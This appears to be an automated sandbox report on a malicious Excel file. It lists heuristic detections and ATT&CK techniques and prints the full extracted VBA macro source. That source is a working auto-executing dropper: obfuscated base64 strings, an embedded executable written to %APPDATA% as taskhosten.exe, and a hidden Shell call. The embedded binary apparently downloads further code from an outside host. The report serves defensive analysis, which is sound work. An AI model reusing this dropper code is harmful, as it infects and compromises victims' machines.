MALICIOUS
358
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The file contains obfuscated VBA macros, including AutoOpen and Workbook_Open, which are designed to execute automatically. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates the macro uses a custom decoder and calls CreateObject and Shell functions. The 'SE_ENABLE_LURE' heuristic suggests the document prompts the user to enable macros. The script attempts to create a 'WScript.Shell' object, likely to download and execute a secondary payload, as indicated by the 'CLAMAV_DETECTION' for Win.Downloader.Carp.
Heuristics 11
-
ClamAV: Win.Downloader.Carp-6307520-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Downloader.Carp-6307520-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell uzwlcaktigemqvucvzix, vbHide End Sub -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
On Error Resume Next Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA==")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
On Error Resume Next Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA==")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() showDatagram -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() showDatagram -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly0000DB4A 41 inc ecx 0000DB4B 41 inc ecx 0000DB4C 41 inc ecx 0000DB4D 41 inc ecx 0000DB4E 41 inc ecx 0000DB4F 41 inc ecx 0000DB50 41 inc ecx 0000DB51 41 inc ecx 0000DB52 41 inc ecx 0000DB53 41 inc ecx 0000DB54 41 inc ecx 0000DB55 41 inc ecx 0000DB56 41 inc ecx 0000DB57 41 inc ecx 0000DB58 41 inc ecx 0000DB59 41 inc ecx 0000DB5A 41 inc ecx 0000DB5B 41 inc ecx 0000DB5C 41 inc ecx 0000DB5D 41 inc ecx 0000DB5E 41 inc ecx 0000DB5F 41 inc ecx 0000DB60 41 inc ecx 0000DB61 41 inc ecx 0000DB62 41 inc ecx 0000DB63 41 inc ecx 0000DB64 41 inc ecx 0000DB65 41 inc ecx 0000DB66 41 inc ecx 0000DB67 41 inc ecx 0000DB68 41 inc ecx 0000DB69 41 inc ecx 0000DB6A 41 inc ecx 0000DB6B 41 inc ecx 0000DB6C 41 inc ecx 0000DB6D 41 inc ecx 0000DB6E 41 inc ecx 0000DB6F 41 inc ecx 0000DB70 41 inc ecx 0000DB71 41 inc ecx 0000DB72 41 inc ecx 0000DB73 41 inc ecx 0000DB74 41 inc ecx 0000DB75 41 inc ecx 0000DB76 41 inc ecx 0000DB77 41 inc ecx 0000DB78 41 inc ecx 0000DB79 41 inc ecx 0000DB7A 41 inc ecx 0000DB7B 41 inc ecx 0000DB7C 41 inc ecx 0000DB7D 41 inc ecx 0000DB7E 41 inc ecx 0000DB7F 41 inc ecx 0000DB80 41 inc ecx 0000DB81 41 inc ecx 0000DB82 41 inc ecx 0000DB83 41 inc ecx 0000DB84 41 inc ecx 0000DB85 41 inc ecx 0000DB86 41 inc ecx 0000DB87 41 inc ecx 0000DB88 41 inc ecx 0000DB89 41 inc ecx 0000DB8A 41 inc ecx 0000DB8B 41 inc ecx 0000DB8C 41 inc ecx 0000DB8D 41 inc ecx 0000DB8E 41 inc ecx 0000DB8F 41 inc ecx 0000DB90 41 inc ecx 0000DB91 41 inc ecx 0000DB92 41 inc ecx 0000DB93 41 inc ecx 0000DB94 41 inc ecx 0000DB95 41 inc ecx 0000DB96 41 inc ecx 0000DB97 41 inc ecx 0000DB98 41 inc ecx 0000DB99 41 inc ecx 0000DB9A 41 inc ecx 0000DB9B 41 inc ecx 0000DB9C 41 inc ecx 0000DB9D 41 inc ecx 0000DB9E 41 inc ecx 0000DB9F 41 inc ecx 0000DBA0 41 inc ecx 0000DBA1 41 inc ecx 0000DBA2 41 inc ecx 0000DBA3 41 inc ecx 0000DBA4 41 inc ecx 0000DBA5 41 inc ecx 0000DBA6 41 inc ecx 0000DBA7 41 inc ecx 0000DBA8 41 inc ecx 0000DBA9 41 inc ecx
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8433 bytes |
SHA-256: 2f6ac28861387d5f7fc368eba769e14602863b7c6ab77ba6e4ae4550b43bbe41 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub showDatagram()
On Error Resume Next
Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA=="))
Dim La, uzwlcaktigemqvucvzix As String
La = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAHjBXVYAAAAAAAAAAOAAAgELAQsAAAgAAAAEAAAAAAAA7icAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAKAnAABLAAAAAEAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA9AcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAA"
La = La + "CAAAGAucnNyYwAAABAAAAAAQAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADQJwAAAAAAAEgAAAACAAUAwCAAAOAGAAABAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswAwBAAAAAAQAAEXMQAAAKCigRAAAKcgEAAHAoEgAACgsHBnILAABwbxMAAAooFAAACgcoFQAACibeCgYsBgZvFgAACtzeAybeACoBHAAAAgAGACowAAoAAAAAAAAAADw8AAMBAAABHgIoFwAACipCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAAcAgAAI34AAIgCAADEAgAAI1N0cmluZ3MAAAAATAUAAEAAAAAjVVMAjAUAABAAAAAjR1VJRAAAAJwFAABEAQAAI0Jsb2IAAAAAAAAAAgAAAUcUAgAJAAAAAPolMw"
La = La + "AWAAABAAAAFgAAAAIAAAACAAAAFwAAAA0AAAABAAAAAQAAAAIAAAAAAAoAAQAAAAAABgAlAB4ABgBRADcABgB8AGoABgCTAGoABgCwAGoABgDPAGoABgDoAGoABgABAWoABgAcAWoABgA3AWoABgBvAVABBgCDAVABBgCRAWoABgCqAWoABgDnAccBBgAHAscBCgA1AioCBgBJAj8CBgBeAh4ABgB5Aj8CCgCfAowCBgCtAh4AAAAAAAEAAAAAAAEAAQAAABAAEwAAAAUAAQABAFAgAAAAAJEALAAKAAEAuCAAAAAAhhgxAA4AAQARADEAEgAZADEAEgAhADEAEgApADEAEgAxADEAEgA5ADEAEgBBADEAEgBJADEAEgBRADEAEgBZADEAFwBhADEAEgBpADEAEgBxADEAEgB5ADEAHACBADEADgCJADEADgCRAE4CIQCZAGUCJQCJAGwCKwChAH4CMQCpAKcCOACxALkCDgAJADEADgAuAAsARAAuABMAqgAuABsAxAAuACMAxAAuACsAxAAuADMAqgAuADsAygAuAEMAxAAuAFMAxAAuAFsA4gAuAGsADAEuAHMAGQEuAHsAIgE"
La = La + "+AASAAAABAAAAAAAAAAAAAAAAACUCAAAEAAAAAAAAAAAAAAABABUAAAAAAAQAAAAAAAAAAAAAAAEAHgAAAAAAAAAAPE1vZHVsZT4AZG93bi5leGUASwBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AE1haW4ALmN0b3IAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3lzdGVtLlJlZmxlY3Rpb24AQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5Q3VsdHVyZUF0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAQ29tVmlzaWJsZUF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEFzc2VtYmx5VmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZX"
La = La + "MAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkb3duAFN5c3RlbS5OZXQAV2ViQ2xpZW50AFN5c3RlbS5JTwBQYXRoAEdldFRlbXBGaWxlTmFtZQBTdHJpbmcAQ29uY2F0AERvd25sb2FkRGF0YQBGaWxlAFdyaXRlQWxsQnl0ZXMAU3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3MAU3RhcnQASURpc3Bvc2FibGUARGlzcG9zZQAAAAAACS4AZQB4AGUAADFoAHQAdABwADoALwAvAG4AcwAuADcAbgBpADcALgBjAG8AbQA6ADEANwAxADcALwAAAAAAelUbqVseP0SwtabW/Lm1XAAIt3pcVhk04IkDAAABAyAAAQQgAQEOBCABAQIEIAEBCAMAAA4FAAIODg4FIAEdBQ4GAAIBDh0FBQABElUOBQcCEkUOZQEAKS5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC4wLFByb2ZpbGU9Q2xpZW50AQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZR8uTkVUIEZyYW1ld29yayA0IENsaWVudCBQcm9maWxlGQEAFENvbnNvbGVBcHBsaWNhdGlvbjE2AAAFAQAAAAAXAQASQ29weXJpZ2h0IMKpICAyMDE1AAApAQAkZjVjMmU1NzEtM2JiNS00NWJhLTg4YWItN2QyZWZjZjk2MjZmAAAMAQAHMS4wLjAuMAAACAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQAAAMgnAAAAAAAAAAAAAN4nAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQJ"
La = La + "wAAAAAAAAAAX0NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
La = La + "CAAAAwAAADwNwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
uzwlcaktigemqvucvzix = hqdhfwoybiyesyjvigoz.ExpandEnvironmentStrings(LVFEnuYuOL("JUFQUERBVEEl")) & LVFEnuYuOL("XHRhc2tob3N0ZW4uZXhl")
Set wawescrknzcukmwelbsx = CreateObject(LVFEnuYuOL("QURPREIuU3RyZWFt"))
wawescrknzcukmwelbsx.Open
wawescrknzcukmwelbsx.Type = 1
wawescrknzcukmwelbsx.Write merde(La)
wawescrknzcukmwelbsx.Position = 0
wawescrknzcukmwelbsx.SaveToFile uzwlcaktigemqvucvzix
wawescrknzcukmwelbsx.Close
Shell uzwlcaktigemqvucvzix, vbHide
End Sub
Private Function merde(bobby)
Dim DM, EL
Set DM = CreateObject(LVFEnuYuOL("TWljcm9zb2Z0LlhNTERPTQ=="))
Set EL = DM.createElement(LVFEnuYuOL("dG1w"))
EL.DataType = LVFEnuYuOL("YmluLmJhc2U2NA==")
EL.Text = bobby
merde = EL.NodeTypedValue
End Function
Function LVFEnuYuOL(ByVal yyPdMVSXBI)
Const HEgTymDLVn = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
yyPdMVSXBI = Replace(yyPdMVSXBI, vbCrLf, "")
yyPdMVSXBI = Replace(yyPdMVSXBI, vbTab, "")
yyPdMVSXBI = Replace(yyPdMVSXBI, " ", "")
dataLength = Len(yyPdMVSXBI)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "LVFEnuYuOL", ""
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(yyPdMVSXBI, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, HEgTymDLVn, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "LVFEnuYuOL", ""
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
LVFEnuYuOL = sOut
End Function
Sub AutoOpen()
showDatagram
End Sub
Sub Workbook_Open()
showDatagram
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.